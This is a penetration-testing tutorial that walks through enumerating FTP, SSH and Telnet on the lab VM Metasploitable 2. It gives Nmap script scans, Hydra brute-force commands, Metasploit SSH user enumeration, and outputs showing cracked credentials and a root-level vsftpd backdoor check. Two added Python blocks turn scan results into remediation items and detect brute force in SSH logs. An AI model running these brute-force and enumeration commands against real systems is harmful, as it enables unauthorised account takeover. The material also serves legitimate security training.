Advanced Enumeration Phase in Kali Linux – Part 1
In this phase, the goal is to more accurately identify services, protocols, and vulnerabilities in the target systems. This step takes place after the initial identification stage (where only basic information is obtained) and includes more advanced tools and techniques that allow you to extract more detailed and sensitive information.
The Enumeration phase typically consists of the following steps:
- Service Scan: In this stage, tools such as Nmap are used to more accurately identify versions and configurations of services. For example, you may be able to identify the exact version of an SSH or Telnet service.
- Scripting Scans: Nmap and other tools typically include scripts that allow you to automatically identify certain vulnerabilities. For example, by using Nmap scripts for Telnet or SSH, you can identify vulnerabilities such as lack of encryption support or leakage of credential information.
- Brute-Forcing Attacks: Once you have identified possible accounts, you can use tools like Hydra to perform brute-force attacks to test passwords. These attacks typically use word lists to guess the correct password for each user.
- Finding vulnerabilities: At this point, it's important to identify specific vulnerabilities related to vulnerable service versions or misconfigurations. This information helps you exploit those weaknesses in the later (exploitation) phase of the attack.
The purpose of this phase:
- Extracting more accurate information from the target system
- Identifying weaknesses and vulnerabilities
- Gaining access to user accounts and passwords
- Using automated scripts and tools to identify issues faster
This phase typically relies on several tools, including Nmap, Hydra, and Metasploit, to gather more detail and to exploit vulnerabilities.
In our discussion, enumeration means gathering the essential information that allows us to exploit a particular service (e.g., FTP, SSH, etc.). For example, brute-force enumeration of the SSH service allows us to find valid credentials and use them to log into the remote host. Another common method is to use Nmap scripts to gather essential information such as remote users, service versions, remote code execution exploits, and more. This chapter doesn't cover all services, but the important part is that you understand the concept of the enumeration process so that you can apply it to any type of service.
This chapter covers the enumeration of the following services:
■ FTP
■ SSH
■ Telnet
■ SMTP
■ POP3 & IMAP4
■ Microsoft SQL
■ Oracle Database Server
■ MySQL
■ Docker Engine
■ Jenkins
■ HTTP/S
■ RDP
■ VNC
■ SMB
■ SNMP
Transfer Protocols
In the comprehensive network scanning tutorial in Kali Linux you have already learned how to scan the network and identify the services on each host, so by now you know how to use Nmap for that. After scanning each host, we need to start looking for potential vulnerabilities to exploit. For example, you find that your target is a Linux host and uses SSH to let remote users authenticate. Do you know what you need to do next? In the following sections, you'll see a logical structure that allows you to examine each popular service.
FTP (Port 21)
File Transfer Protocol (FTP) is used to transfer files between a client and a remote server. A remote server is used to store files so that you can access them remotely. Sometimes FTP is used by web applications to sync hosted source code (e.g., HTML, JavaScript, etc.). The two secure FTP implementations are FTPS and SFTP. The Secure File Transfer Protocol (SFTP) uses the SSH protocol to transfer files (it uses the same port 22 as SSH by default). FTPS (FTP over SSL/TLS), on the other hand, uses SSL to encrypt the file transfer, using ports 989 and 990 for this purpose.
These are the common weaknesses of the FTP protocol:
■ Credentials are sent in clear text.
■ File transfers are not encrypted.
FTP Server Exploitation Scenarios
At this point, it's important to understand what the exploitation will be like for the service (you need to know what you're looking for in advance, or you'll just scan with your eyes closed). An FTP server can be exploited in a variety of ways. Here are the common scenarios you'll encounter throughout your career:
■ Brute-force credentials
■ Sniffing for clear-text credentials
■ Sniffing for unencrypted files
■ Anonymous access
■ Finding a public exploit associated with the target version of the FTP server (in the next chapter, you'll learn how to search for public exploits)
Enumeration Workflow
Throughout this chapter, you'll learn the enumeration workflow for each service through real-life examples (one example is worth more than a thousand words). In this example, the target is a vulnerable Linux virtual machine called Metasploitable version 2; you can download this VM from Rapid7.
Service Scan
In the first step, we'll do a simple service scan using Nmap to get an idea of the target FTP server:
root@kali:~# nmap -sV -O -sC -p21 -T5 metasploitable.kcorp.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 14:33 EDT
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00062s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.0.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:D2:1A:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results
at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
Based on the results of the previous scan, the following have been identified (we will validate this information in the exploitation phase):
■ We can log in to the FTP server using anonymous credentials.
■ The FTP server version is vsftpd 2.3.4.
■ The control and data connections are confirmed to be plain text.
Advanced Scripting Scan with Nmap
The basic script scan (-sC, technically called the default script set) doesn't run every script. At this point, we will enable all of Nmap's FTP scripts using the --script=ftp* option. Taking the time to learn your target step by step gives you a different perspective and lets you make better choices. (Penetration testing isn't just about running scanners; it's a methodology.)
root@kali:~# nmap -sV -O --script=ftp* -p21 -T5 metasploitable.kcorp.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 14:41 EDT
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 1166 guesses in 181 seconds, average tps: 6.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.0.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpddownload-backdoored.html
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|_ https://www.securityfocus.com/bid/48539
[...]
Advanced Script Scan Results:
■ Anonymous login confirmation (which was previously found in the first scan).
■ Brute-Force script was able to find account credentials.
■ The server version was found to be vulnerable and could be exploited.
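As an added example (not from the original post and not part of Nmap), a small Python parser that reduces the script-scan output above to the findings just listed, plus a triage step that turns them into the remediation items a defender would track. The sample input is a trimmed copy of the output shown above; the line-matching rules are heuristics for Nmap's normal-output format, not an official grammar.

```python
import re

# Constructed sample: a trimmed copy of the Nmap FTP script-scan output shown
# above (vsftpd 2.3.4), keeping only the lines this parser cares about.
SAMPLE_NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-brute:
|   Accounts:
|     user:user - Valid credentials
| ftp-syst:
|     Control connection is plain text
|     Data connections will be plain text
| ftp-vsftpd-backdoor:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
"""

SERVICE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
SCRIPT_RE = re.compile(r"^([a-z0-9]+-[a-z0-9-]+):")   # NSE names such as ftp-anon
CRED_RE = re.compile(r"(\S+):(\S*)\s+-\s+Valid credentials")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_nmap_findings(text):
    """Reduce Nmap normal output to the facts the text above lists."""
    res = {"services": [], "anonymous_login": False, "plaintext": False,
           "valid_credentials": [], "vulnerable": [], "cves": []}
    script = None
    for raw in text.splitlines():
        m = SERVICE_RE.match(raw)
        if m:
            res["services"].append((int(m.group(1)), m.group(3), m.group(4).strip()))
            continue
        if not raw.startswith("|"):
            continue                                # not an NSE script line
        body = raw.lstrip("|_ ").rstrip()           # drop the NSE tree prefix
        s = SCRIPT_RE.match(body)
        if s:
            script = s.group(1)                     # remember which script is reporting
        if "Anonymous FTP login allowed" in body:
            res["anonymous_login"] = True
        if "plain text" in body or "does not support encryption" in body:
            res["plaintext"] = True
        c = CRED_RE.search(body)
        if c:
            res["valid_credentials"].append((c.group(1), c.group(2)))
        if body.startswith("State: VULNERABLE") and script:
            res["vulnerable"].append(script)
        res["cves"].extend(CVE_RE.findall(body))
    return res


def triage(res):
    """Turn the parsed facts into the remediation items a defender would track."""
    items = [f"{name}/{port}: banner discloses version '{ver}'"
             for port, name, ver in res["services"]]
    if res["anonymous_login"]:
        items.append("anonymous login enabled: disable it or confine it to a read-only chroot")
    if res["plaintext"]:
        items.append("credentials and data travel in clear text: replace with SFTP or FTPS")
    for user, pw in res["valid_credentials"]:
        items.append(f"guessable credential {user}:{pw}: reset it and rate-limit logins")
    cves = ", ".join(res["cves"]) or "no CVE listed"
    for script in res["vulnerable"]:
        items.append(f"{script} reports VULNERABLE ({cves}): patch or replace the service")
    return items
```

The same parser handles the ssh-brute and telnet-brute output later in this chapter, since those scripts report valid credentials in the same "user:pass - Valid credentials" form.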
More techniques for brute-forcing
If you want to do an additional brute-force scan, you can use Hydra to:
root@kali:~# hydra -t 10 -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ftp://metasploitable.KCorp.local
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-04 20:07:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17000 login tries (l:17/p:1000), ~1700 tries per task
[DATA] attacking ftp://metasploitable.KCorp.local:21/
[STATUS] 190.00 tries/min, 190 tries in 00:01h, 16810 to do in 01:29h, 10 active
[21][ftp] host: metasploitable.KCorp.local login: ftp password: 123456789
[...]
The Hydra command uses the following options:
■ -t 10: run 10 parallel threads
■ -L: path to the usernames file
■ -P: path to the passwords file
In the next chapter, we will deal with the exploitation phase (the information gathered in this chapter is the input for that phase). At this point, we are gathering information on how to exploit each service individually.
SSH (Port 22)
We've learned how the SSH protocol works in previous chapters. If you're not familiar with the difference between public and private keys and how to use them in the SSH protocol
SSH Server Exploitation Scenarios
An SSH server can be exploited in a variety of ways. Here are some common scenarios to look out for:
- Brute-force credentials: the attacker tries to log in to the SSH server by guessing usernames and passwords. This is usually the main goal in the enumeration phase.
- Adding a public key to the authorized_keys file on the server: the attacker must first gain access to the system (e.g. through a shell) in order to add their public key to the authorized_keys file. From then on, they can log in with the matching private key.
- Using SSH to pivot to other hosts on the network: when a host is compromised and the attacker obtains its private and public keys, they can use SSH to connect to other hosts on the same network. This is known as "pivoting" and is usually done in the post-exploitation phase.
- Finding a public exploit for the target SSH server version: if the target's SSH server version has a known vulnerability, the attacker can use a public exploit for it to get into the system.
- Reading the authorized_keys file for the DSA algorithm (not RSA): if an attacker can read a key file that uses the DSA algorithm, they can use the corresponding private key to access the server. This scenario requires shell access or the exploitation of a vulnerability such as local file inclusion (LFI) in a web application. Once the private key is found, the attacker can log in to the server with:
$ ssh -i [private key file] [user@ftp_server_ip]
These scenarios are the ways an attacker can exploit an SSH server. The goal is to get into the system and then gain more access by identifying further vulnerabilities.
You can read a detailed article about such an attack here: https://github.com/g0tmi1k/debian-ssh
Advanced Script Scanning with Nmap
Here's a quick task to extract information from the SSH server on the Metasploitable host:
root@kali:~# nmap -sV -O -sC -p22 -T5 metasploitable.kcorp.local
Scan Result:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 10:55 EDT
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
MAC Address: 00:0C:29:D2:1A:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
[...]
The only information obtained from the previous scan is the version of the remote SSH server. Next, we need to run a full script scan with Nmap to see whether we can find more issues with the target SSH server:
root@kali:~# nmap -sV -O --script=ssh* -p22 -T5 metasploitable.kcorp.local
Scan Result:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 11:00 EDT
[...]
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00075s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 204 guesses in 181 seconds, average tps: 1.2
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| ssh-publickey-acceptance:
|_ Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
[...]
The previous results show that Nmap has found valid credentials for logging in to SSH remotely. Remember that this finding is important because with these credentials we can get remote access to the target server.
Brute-Forcing SSH with Hydra
As we did in FTP Brute-Force, we can also use Hydra for SSH. We'll use the same options we used for the FTP scenario:
root@kali:~# hydra -t 10 -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh://metasploitable.KCorp.local
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-05 11:11:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17000 login tries (l:17/p:1000), ~1700 tries per task
[DATA] attacking ssh://metasploitable.KCorp.local:22/
[STATUS] 130.00 tries/min, 130 tries in 00:01h, 16870 to do in 02:10h, 10 active
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-05 14:34:08
Unfortunately, the previous run found no results. In the next section, "Advanced Brute Force Techniques", you will learn how to brute-force like a pro.
Advanced Brute Force Techniques
Now it's time to use Metasploit to improve our brute-force technique. In the previous example, you saw that we didn't find any credentials. In fact, we attempted a blind brute-force attack against our target host. In this example, we'll first use Metasploit to enumerate valid usernames on the Metasploitable host, and then attack those specific users instead of guessing.
To start Metasploit, we enter the msfconsole command in the terminal window:
root@kali:~# msfconsole
After that, the Metasploit console will load and we will take the following actions:
- We use the ssh_enumusers username enumeration module.
- We set the IP address of the Metasploitable host.
- We set the remote SSH port number.
- We specify the path of the usernames dictionary file.
- We set the number of parallel threads to 25.
Finally, we run it:
msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.16.0.101
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/namelist.txt
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set PORT 22
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 25
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
Scan Output:
[*] 172.16.0.101:22 - SSH - Using malformed packet technique
[*] 172.16.0.101:22 - SSH - Checking for false positives
[*] 172.16.0.101:22 - SSH - Starting scan
[+] 172.16.0.101:22 - SSH - User 'backup' found
[+] 172.16.0.101:22 - SSH - User 'dhcp' found
[+] 172.16.0.101:22 - SSH - User 'ftp' found
[+] 172.16.0.101:22 - SSH - User 'games' found
[+] 172.16.0.101:22 - SSH - User 'irc' found
[+] 172.16.0.101:22 - SSH - User 'mail' found
[+] 172.16.0.101:22 - SSH - User 'mysql' found
[+] 172.16.0.101:22 - SSH - User 'news' found
[+] 172.16.0.101:22 - SSH - User 'proxy' found
[+] 172.16.0.101:22 - SSH - User 'root' found
[+] 172.16.0.101:22 - SSH - User 'service' found
[+] 172.16.0.101:22 - SSH - User 'snmp' found
[+] 172.16.0.101:22 - SSH - User 'syslog' found
[+] 172.16.0.101:22 - SSH - User 'user' found
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
In the previous output, a number of usernames were found. Next, we save all of these usernames to a file, users.txt, in the root home directory. Note that in the example below we use a smaller password dictionary to get results faster. Finally, we use the -e nsr option, for the following reasons:
- "n" tries a blank password (no password).
- "s" tries the username as the password (username=password).
- "r" tries the reversed username as the password (e.g. for the username root, the password toor).
root@kali:~# hydra -t 10 -e nsr -L /root/users.txt -P /opt/SecLists/Passwords/darkweb2017-top100.txt ssh://metasploitable.KCorp.local
[...]
[22][ssh] host: metasploitable.KCorp.local login: service password: service
[22][ssh] host: metasploitable.KCorp.local login: user password: user
1 of 1 target successfully completed, 2 valid passwords found
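The defender's side of the Hydra and ssh_enumusers runs above, as an added example that is not part of the original post: a detector over constructed sshd log lines (syslog format, year 2020 assumed; the source IP and usernames mirror the page's output, while the admin login and the thresholds are assumptions) that flags a source after a burst of failed passwords, lists the distinct usernames it tried, and reports any login accepted from it afterwards.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth-log lines modelled on what sshd on the target would
# record during the Hydra run above (source IP and usernames are the ones in the
# page's output; the "admin" publickey login is invented benign traffic).
SAMPLE_AUTH_LOG = """\
Jun  5 11:11:20 metasploitable sshd[4101]: Invalid user backup from 172.16.0.102
Jun  5 11:11:20 metasploitable sshd[4101]: Failed password for invalid user backup from 172.16.0.102 port 40110 ssh2
Jun  5 11:11:21 metasploitable sshd[4102]: Failed password for root from 172.16.0.102 port 40111 ssh2
Jun  5 11:11:21 metasploitable sshd[4103]: Failed password for ftp from 172.16.0.102 port 40112 ssh2
Jun  5 11:11:22 metasploitable sshd[4104]: Failed password for service from 172.16.0.102 port 40113 ssh2
Jun  5 11:11:22 metasploitable sshd[4105]: Accepted password for service from 172.16.0.102 port 40114 ssh2
Jun  5 11:11:23 metasploitable sshd[4106]: Failed password for user from 172.16.0.102 port 40115 ssh2
Jun  5 11:11:24 metasploitable sshd[4107]: Accepted password for user from 172.16.0.102 port 40116 ssh2
Jun  5 11:30:01 metasploitable sshd[4201]: Accepted publickey for admin from 172.16.0.50 port 52000 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed password|Accepted \w+|Invalid user) (?:for )?(?:invalid user )?(\S+) "
    r"from (\d+\.\d+\.\d+\.\d+)")


def parse_sshd_events(log_text, year=2020):
    """Group sshd auth events by source IP as (timestamp, kind, username)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:                                   # syslog omits the year; supply it
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events[m.group(4)].append((ts, m.group(2), m.group(3)))
    return events


def detect_ssh_bruteforce(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Flag a source once it reaches max_failures failed passwords inside the
    window (Hydra with 10 tasks does this in seconds), list the distinct names it
    tried (the enumeration signature) and any login accepted from it afterwards."""
    alerts = {}
    for ip, evs in parse_sshd_events(log_text).items():
        fails = sorted(ts for ts, kind, _ in evs if kind == "Failed password")
        burst_start = next((fails[i] for i in range(len(fails) - max_failures + 1)
                            if fails[i + max_failures - 1] - fails[i] <= window), None)
        if burst_start is None:
            continue                            # below threshold: normal traffic
        alerts[ip] = {
            "failures": len(fails),
            "usernames": sorted({u for _, kind, u in evs if kind == "Failed password"}),
            "accepted_after": [u for ts, kind, u in evs
                               if kind.startswith("Accepted") and ts >= burst_start],
        }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A non-empty accepted_after list for a flagged source is the event worth paging on, since it is exactly what Hydra's "valid passwords found" line looks like from the server side.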
In the next chapter, we will exploit the results we have already found. In addition, we will delve deeper into each SSH exploit scenario.
Telnet (Port 23)
Telnet is an old way of connecting to a remote host over TCP port 23 so that you can control the host via the command line (like SSH). Unlike SSH, Telnet communications are not secure and are sent in clear text. This protocol was commonly used on older network devices as well as on Windows operating systems. Today, it is rarely active in enterprises, but it still exists, and a server administrator can enable it at any time.
Some common weaknesses of Telnet include:
■ Login credentials are sent in clear text.
■ Command-line sessions are not encrypted.
Exploitation Scenarios for Telnet Server
A Telnet server can be exploited in a variety of ways. Here are some common scenarios that you may encounter while performing a penetration test:
■ Brute-force credentials
■ Sniffing for clear-text login credentials
■ Sniffing for unencrypted command-line sessions
■ Finding a public exploit associated with the target Telnet server version
Enumeration Workflow
Here are the three tasks we'll perform for this enumeration workflow:
■ Basic service scan using Nmap
■ Advanced scan using Nmap scripts
■ Brute-forcing credentials using Hydra
Service Scan
In the first step, we will perform a basic service scan using Nmap to obtain information about the Telnet server on the Metasploitable host:
root@kali:~# nmap -sV -O -sC -p23 -T5 metasploitable.kcorp.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-08 13:39 EDT
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
MAC Address: 00:0C:29:D2:1A:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[...]
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds
This scan shows port 23 (the Telnet port) open and identifies the running server (Linux telnetd).
Advanced Scripting Scan
The next step is to look for more vulnerabilities using the full Telnet script scan in Nmap:
root@kali:~# nmap -sV -O --script=telnet* -p23 -T5 metasploitable.kcorp.local
[...]
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
| telnet-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 1227 guesses in 184 seconds, average tps: 6.6
| telnet-encryption:
|_ Telnet server does not support encryption
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[...]
Nmap done: 1 IP address (1 host up) scanned in 185.20 seconds
Based on the previous output, we conclude the following:
■ We can log in to the Telnet server remotely using the username user and the password user.
■ It is also confirmed that communications are not encrypted.
Brute Force with Hydra
To be thorough, we use Hydra to see if it can find more credentials than Nmap did:
root@kali:~# hydra -t 10 -e nsr -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/SecLists/Passwords/darkweb2017-top100.txt telnet://metasploitable.KCorp.local
[...]
[23][telnet] host: metasploitable.KCorp.local login: user password: user
Hydra found the same account that had previously been identified by Nmap.